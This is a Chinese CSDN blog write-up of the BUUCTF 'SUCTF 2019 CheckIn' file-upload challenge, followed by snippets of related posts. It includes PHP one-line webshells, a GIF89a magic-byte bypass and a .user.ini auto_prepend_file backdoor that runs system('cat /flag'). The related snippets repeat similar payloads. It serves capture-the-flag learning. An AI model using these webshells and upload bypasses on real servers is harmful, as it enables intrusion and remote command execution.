buuctf-SUCTF 2019 CheckIn(小宇特详解)

最新推荐文章于 2023-06-22 16:29:05 发布
最新推荐文章于 2023-06-22 16:29:05 发布
阅读量2.7k 收藏 12
点赞数 4
文章标签: php apache 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhy18634297976/article/details/122635981
版权

buuctf-SUCTF 2019 CheckIn(小宇特详解)

咋一看这是一道文件上传

这里先尝试一下上传一个php文件

里面写一个最简单的一句话木马就行

<?php eval(@$_POST['shell']);?>

上传试试

回显illegal suffix!(非法后缀)

这里尝试一下修改文件拓展名php5,phtml,等都没有成功

然后进行抓包,修改content-type,都是回显的illegal suffix!(非法后缀)

这里我上传一张jpg

回显<? in contents!

说明不能有<?

那这里就清晰了,修改一下一句话木马使得一句话木马没有<?

<script language='php'>eval($_POST['shell']);<scirpt>

这里上传包含上面代码的jpg文件

回显exif_imagetype:not image!

这里使用exif_imagetype函数来判断是否是jpg文件,这里使用添加gif文件头GIF89a就能进行绕过

这里成功上传

这里尝试上传一个.htaccess文件将jpg文件变成php文件执行

这里在1.txt文件中写入

AddType application/x-httpd-php .jpg

然后在1.txt的文件中打开cmd,输入ren 1.txt .htaccess,这样来生成.htaccess

然后将.htaccess上传

回显exif_imagetype:not image!

说明不行

这里由于当你上传成功的时候会出现index.php,所以这里使用的是.user.ini

.user.ini简介

.user.ini文件
自PHP5.3.0起,PHP支持基于每个目录的.htaccess风格的IN/文件。此类文件仅被CGl /FastCGl SAPI处理。此功能使得PECL的 htscanner扩展作废。如果使用Apache,则用.htaccess文件有同样效果。
除了主php.ini 之外,PHP还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVERL’DOCUMENT_RO0T’]所指定的)。如果被执行的PHP文件在web根目录之外,则只扫描该目录。
在.user.ini风格的INl文件中只有具有 PHP_INI_PERDIR和PHP_INI_USER模式的INI设置可被识别。
两个新的INI指令,user_ini.filename和user_ini.cache_ttl控制着用户INI文件的使用。
user_inifilename设定了 PHP会在每个目录下搜寻的文件名;如果设定为空字符串则PHP不会搜寻。默认值是.user.ini。user_ini.cache_ttl控制着重新读取用户INl文件的间隔时间。默认是300秒(5分钟)。

这里的意思就是说我们在.user.ini中设置php.ini中PHP_INI_PERDIRPHP_INI_USER 模式的 INI 设置,只要是使用CGI/FastCGI模式的服务器都可以使用.user.ini

这里使用的是auto_prepend_fileauto_append_file

他们的作用就是指定一个文件(1.jpg),那么该文件就会被包含在要执行的php文件中(index.php)。

auto_prepend_file是在文件前插入;auto_append_file在文件最后插入(当文件调用的有exit()时该设置无效)

这里先上传一个.user.ini

GIF89a
auto_prepend_file=1.jpg

这里成功上传

然后在上传一个图片马

这里注意上面的是1.jpg,那么下面上传的就是1.jpg

GIF89a
<script language='php'>system('cat /flag');</script>

先上传.user.ini,然后上传1.jpg,然后访问

/uploads/cc551ab005b2e60fbdc88de809b2c4b1/index.php

抓包找到了flag。

小宇特详解
关注
  • 4
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
BUUCTF__[SUCTF 2019]CheckIn_题解
风过江南乱的博客
05-22 1429
一、前言 最近有点烦,感觉自己什么都不会。估计是在家待的太久了,浪费了很多时间。 这学期不开学了,真烦,被网课折磨,这都快期末了。 二、看题 一个文件上传的题目,而且给了源码,但可能没有也能做。 不过我看wp都看的很懵。 先尝试上传一张正常的图片,回显了文件目录 再尝试上传php一句话木马。提示非法后缀 <?php @eval($_POST['post']) ?> 再尝试改一下文件后缀,提示有 <? 应该是黑名单过滤。 所以尝试用 <script language="
BUUCTF-CheckIn
m0_47571887的博客
11-09 765
打开题目,貌似是一道考上传的题目 上传php文件被过滤,我们就上传图片马, 我们用.htaccess来进行解析,尝试过后貌似行不通, 这里使用.user.ini .user.ini:在php.ini中的配置项中有两个配置项,一个是auto_append_file和auto_prepend_file,auto_prrpend_file意思是指定一个文件,自动包含在要执行的文件前,类似与在文件前调用了require()函数。而auto_append_file相似,只是在文件后面进行包含,使用方法很简
Buuctf(文件上传.uesr.ini绕过)[SUCTF 2019]CheckIn 1
m0_64444909的博客
05-21 2123
解题思路 一.打开题目:发现一个上传框,猜测上传一句话木马,获取后台shell 二.上传.php .phtml .等有关的PHP文件,都显示非法后缀 三.上传.htaccess文件
[BUUCTF]CheckIn (writeup)
weixin_63306244的博客
06-22 155
因为.user.ini是将a.png放到index.php文件的顶部进行执行。回显:exif_imagetype:not image!蚁剑后面的文件是index.php并不是a.png。所以要访问的是index.php。看到这个后就可以直接上蚁剑了。进入后看到是一道上传题。那就只剩下最后一种办法。随后看看了之前用过的。
SUCTF_Checkin
When you collect everything, you understand nothing.
10-25 609
测试后一共有三种回显结果: <? in contents!表示 <?不能连续出现在文件中 illegal suffix!表示 不能上传后缀为phpphp4、php5、phtml等可直接被解析的PHP文件 exif_imagetype:not image表示判断一个图片的类型(即读取一个图像的第一个字节并检查其签名) 解题思路 先上传一个.user.ini文件,.user.ini...
BUUCTF:[SUCTF 2019]CheckIn
末初的CSDN博客
11-04 1266
题目地址:https://buuoj.cn/challenges#[SUCTF%202019]CheckIn 上传文件后缀名黑名单机制,常用php及相关可解析扩展名等无法成功上传 使用.user.ini构造后门 user.ini如何构造后门详情见P神:https://www.leavesongs.com/PENETRATION/php-user-ini-backdoor.html 首先制造图片马 图片马不能包含<?,使用 <script language="php">eval($.
hence-flight-checkin
05-06
link rel =" import " href =" bower_components/hence-flight-checkin/hence-flight-checkin.html " >发展所有开发都是利用/ src和/ test文件夹中的文件进行的。依存关系元素依赖关系通过NPM& 进行管理。 您...
42-qr-checkin:二维码签到
04-01
$ cd 42-qr-checkin $ npm install 在42 intra上注册,然后将重定向URI设置为http://localhost:4200/login/42/return 。 将.env.sample复制到.env并编辑CLIENT_ID和CLIENT_SECRET信息。 启动服务器。 $ npm run ...
liang-chen-yun-checkin
03-31
报到1:前叉仓库2:在仓库的秘密中记录账号密码设置->秘密2.1: 添加 EMAIL2.2: 添加 PASSWORD
genshin-daily-checkin
04-23
怎么跑 在Docker Swarm上运行 例子: docker service create --name genshin-daily-login truong996/genshin-daily-login 仅运行Docker docker run -d truong996/genshin-daily-login
genshin-mys-checkin:【蚊子的腿也是腿】原神米游社每日签到,原神微博超话签到,领取礼包,自动推送
03-08
genshin-mys-checkin 每天早上7:00〜7:10随机时间签到 部分失败不会使整体流程终止,和你会收到消息来自GitHub的Actions失败提醒邮件 运行前会自动同步主仓库,并使用主仓库文件解决冲突,如有自定义需求请自行修改...
[NISACTF 2022]checkin
m0_60716947的博客
10-18 1071
010 editor使用
BUUCTF】[SUCTF 2019]CheckIn
aoao331198的博客
04-09 471
废话不多讲,老生常谈的文件上传题目 需要传一个图片马 GIF89a <script language='php'>@eval($_POST['abc']);</script> 还有一个.user.ini文件 文件上传之.user.ini GIF89a auto_prepend_file=upload.jpg 作用是指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。 蚁剑链接 http://c8a6d5ca-0f52-4c27-a06f-
[文件上传]浅析.user.ini的利用
cosmoslin的博客
10-16 6624
.user.ini php.ini是php的一个全局配置文件,对整个web服务起作用;而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini,我们可以利用这个文件来构造后门和隐藏后门。 实例 php 配置项中有两个配置可以起到一些作用 auto_prepend_file = <filename> //包含在文件头 auto_append_file = <filename> //包含在文件尾
攻防世界ctf题目easyupload做题笔记。
qq_56426046的博客
08-27 4238
攻防世界ctf题目easyupload做题笔记。
【CTF】buuctf web (四)——通过配置文件构造PHP后门
m0_52923241的博客
08-19 1533
知识点 user.ini文件构成的PHP后门 .user.ini文件 它比.htaccess(分布式配置文件)用的更广,不管是nginx/apache/IIS,只要是以fastcgi(进程管理器)运行的php都可以用这个方法。 [SUCTF 2019]CheckIn 上传一个a.php文件,文件内容为<?php phpinfo();?> 提示非法后缀,将后缀php修改为jpg 提示<?被过滤了 将内容变为脚本标记格式:<script language=php> phpi
CTF之web安全基础
weixin_45574957的博客
03-15 1456
CTF WEB安全
备战CTF做题题解
weixin_40707492的博客
07-21 6155
备战CTF初期,没有什么经验,部分操作过程有借鉴大佬
CTF-show-文件上传
qq_52696970的博客
04-02 4279
文件上传1、web1512、web1523、web1534、web1545、web1556、web1567、web1578、web1589、web15910、web16011、web16112、web162 1、web151 (1)法一:抓包改后缀 题目提示是前台校验,发现能上传图片,于是准备好的一句话木马改为png后缀上传再抓包 <?php @eval($_POST['x']);?> 将文件后缀修改为php再放包,可以看到文件上传成功 上传成功后蚁剑连接即可得到flag (2)法二:禁J
2021gkctf checkin
最新发布
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全挑战,包括密码学、逆向工程、漏洞利用等等。参赛者需要通过解决这些挑战来获取旗帜(flag),并提交给比赛组织者。 比赛的checkin阶段通常是指参赛者进行报名和注册的过程。具体的checkin流程可能因比赛组织者而异,一般需要填写个人信息、同意比赛规则等等。 如果你想了解更多关于2021gkctf checkin的信息,建议你访问GKSEC团队的官方网站或者参考他们的相关公告和规则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值